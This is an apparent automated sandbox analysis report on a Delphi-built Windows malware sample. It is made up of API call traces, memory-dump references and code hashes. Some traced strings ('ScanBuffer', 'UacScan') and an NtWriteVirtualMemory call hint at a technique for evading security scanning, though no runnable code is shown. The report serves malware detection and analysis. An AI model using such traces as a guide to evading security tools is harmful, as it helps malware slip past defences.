                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 986138563-0
                                                              • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                              • Instruction ID: b3c61be89990536d5091799c2d160b0c2d3a2110da915f46c909d2db59ea3543
                                                              • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                              • Instruction Fuzzy Hash: AAE0ECB81162025EEA143F259840B37377AEF81751B1444D9A94CCA150E734C842EE35
                                                              APIs
                                                              • SysFreeString.OLEAUT32(?), ref: 02B97362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeString
                                                              • String ID: H
                                                              • API String ID: 3341692771-2852464175
                                                              • Opcode ID: 2aa94389059a6bb7ebf9b0e3b5e5a8e3760db57638e6ea192be0ec45815cc571
                                                              • Instruction ID: 3897a4337b0f9eb21e0ab62e6bcaccd4f86bbe47285dbb80255d5f753c4e5d43
                                                              • Opcode Fuzzy Hash: 2aa94389059a6bb7ebf9b0e3b5e5a8e3760db57638e6ea192be0ec45815cc571
                                                              • Instruction Fuzzy Hash: 5AB1E4B4A116089FDB14CF99D880A9DFBF2FF4A314F2485A9E845AB360DB31AC45DF50
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                                • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                                                              • FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                              • String ID:
                                                              • API String ID: 3283153180-0
                                                              • Opcode ID: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
                                                              • Instruction ID: e17f84f32e0cd69a58b70d613c44507779445a2b0937006cdc1aaac55e2c3e7c
                                                              • Opcode Fuzzy Hash: bd85bd89ca380081145391118e2c278bbe93d12e23870aed4cf5a1183082fb03
                                                              • Instruction Fuzzy Hash: 0C115170A50304BFEF10FBA8C802A5E77A9DB46700F6048F4B60DEBA91DA349D10DB54
                                                              APIs
                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B8E709
                                                                • Part of subcall function 02B8E2EC: VariantClear.OLEAUT32(?), ref: 02B8E2FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Variant$ClearCopy
                                                              • String ID:
                                                              • API String ID: 274517740-0
                                                              • Opcode ID: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
                                                              • Instruction ID: 7bf1e3ded4864f61c59ca6fb385dc82c66579b4beab6ad006c9d07fb8418dab2
                                                              • Opcode Fuzzy Hash: 17c611584ad7faeb75da1bdde0fef493f94f38fb8c05fe8df8bff5fb1dd233cb
                                                              • Instruction Fuzzy Hash: 9211A138B0022097CB25BF28CDC466677EADF9575071494E6FA4E8B256EB30CC41CBA6
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InitVariant
                                                              • String ID:
                                                              • API String ID: 1927566239-0
                                                              • Opcode ID: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
                                                              • Instruction ID: 7459cb3b45086b9843a14ecb74db08cf89c1c6687e534473154925d9846e5890
                                                              • Opcode Fuzzy Hash: 725dba8cb5c154333cb87e7b6164a9ec58bdf03e4951308d089867005896803d
                                                              • Instruction Fuzzy Hash: 45313E71A04209EFDB51EEA8C984AAE77E8EB0C304F5C45A5F90DD7250E734ED51CBA2
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21
                                                                • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeFromProgString
                                                              • String ID:
                                                              • API String ID: 4225568880-0
                                                              • Opcode ID: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
                                                              • Instruction ID: a601ffd8b5705a7334021983f46006c7c67abda5e7a717a6fbe6ea5908073057
                                                              • Opcode Fuzzy Hash: 6dbd5b4a5e2b5b0e51e709b875c5c551933ac6b32bfbbb77beffd082d38bf79c
                                                              • Instruction Fuzzy Hash: DCE06D71604208BBEB05FBA5DC5196A7BFDEF49B50B5148F1F809D3650EA74AE00D960
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(02B80000,?,00000105), ref: 02B85832
                                                                • Part of subcall function 02B85A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
                                                                • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
                                                                • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
                                                                • Part of subcall function 02B85A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
                                                                • Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
                                                                • Part of subcall function 02B85A78: RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
                                                                • Part of subcall function 02B85A78: RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                              • String ID:
                                                              • API String ID: 2796650324-0
                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                              • Instruction ID: d01aebe5f3ee74a37beebc83f3a2725b4e35dbfb7d38b7a93b1a8557ac7caea0
                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                              • Instruction Fuzzy Hash: D6E06D71A002148BCB20EE5C88C0A5637D8AB08750F4105A5EC58DF34AD370E9508BD0
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B87DB0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                              • Instruction ID: ac51af5718fc1c8488434e54017f3104e87ea24c93748124e9d84b7300d69ee8
                                                              • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                              • Instruction Fuzzy Hash: 76D05BB63081507AD220A95A5C44EF75BDCCBC9770F100679B66CC3180E7208C01C771
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeString
                                                              • String ID:
                                                              • API String ID: 3341692771-0
                                                              • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                              • Instruction ID: bf73fa03db257a1aa0158afe27383b0d9b97acc24aab623a56ed7b980423f056
                                                              • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                              • Instruction Fuzzy Hash: 93C012B261133547EB216A9C9CC075662DCDB052A5F1400E1D50CD7240E3609C00CB65
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,?,02BA2A49,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,Initialize), ref: 02B87E47
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                              • Instruction ID: 5d49e2497d2d98d416ca165942b691ad1d6fbc53eecc5d21f091d2c5875c8d97
                                                              • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                              • Instruction Fuzzy Hash: F7C08CA62022090E5E60B2FC1CC069A42CE8B1423A3B01FE1E53CDA1CADB11D822B410
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                              • Instruction ID: b81785ac39ac348f7d99c46f66c62c6545129381dee0b438db767bf1dfaf5fd6
                                                              • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                              • Instruction Fuzzy Hash: BCC08CA62022000B9A60B1FC0CC444A42CC8B0413E3B40FF5B53CCA2D2DB218812B410
                                                              APIs
                                                              • timeSetEvent.WINMM(00002710,00000000,02BABB44,00000000,00000001), ref: 02BABB60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Eventtime
                                                              • String ID:
                                                              • API String ID: 2982266575-0
                                                              • Opcode ID: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
                                                              • Instruction ID: 715282e57a9da7592a63dde5486cb961699fab0960b2df505f1ce444621d609f
                                                              • Opcode Fuzzy Hash: 5581899b360c0b2fa1bf38089f0f260130f075321db0f21791f8002c2abe3144
                                                              • Instruction Fuzzy Hash: B1C092F17D63003EF62466A81CD2F63668DE704B04FA00492BB05EE2D1D5E248604A74
                                                              APIs
                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B84BEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocString
                                                              • String ID:
                                                              • API String ID: 2525500382-0
                                                              • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                              • Instruction ID: 7b8ab41805a3427d10d079dab91b88e961865c5635a094ee0180e5e3eeea658f
                                                              • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                              • Instruction Fuzzy Hash: 64B0923824820359EA5036610D00B7210AC8B50286F8400D19E2CC8080FB00C401C832
                                                              APIs
                                                              • SysFreeString.OLEAUT32(00000000), ref: 02B84C03
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeString
                                                              • String ID:
                                                              • API String ID: 3341692771-0
                                                              • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                              • Instruction ID: 287df9d815f941eefba6d6cc723e51e4b6c241ad810f6534fc255af60c8a45cd
                                                              • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                              • Instruction Fuzzy Hash: 56A022AC0003030ACF0B3B2E800002A20BBBFE03003CAC0E8020C0A000CF3A8000EE30
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B81A03,?,02B82000), ref: 02B815E2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
                                                              • Instruction ID: 57c5026d241bf3d611f125d77d24ea41958ac3ff2b670853cbdfab64455f21bc
                                                              • Opcode Fuzzy Hash: 2e4cb4b6c0ed46af09a0c25fc07f42822163f76d9c6c49259ef018cbed540c16
                                                              • Instruction Fuzzy Hash: FFF0E7F0B523004BEB85DF7999543856BE6E789384F1485B9E609DF298E77194128B10
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B82000), ref: 02B816A4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
                                                              • Instruction ID: e4d9663a327a22b40cec395272e1fac4fe0bad7d1e0b1fd9b1caa6fe5d5e81fb
                                                              • Opcode Fuzzy Hash: a30b3dc5a3773f4adbfd84338ab007605d176a9a0c9a565d81af4ba797a2604b
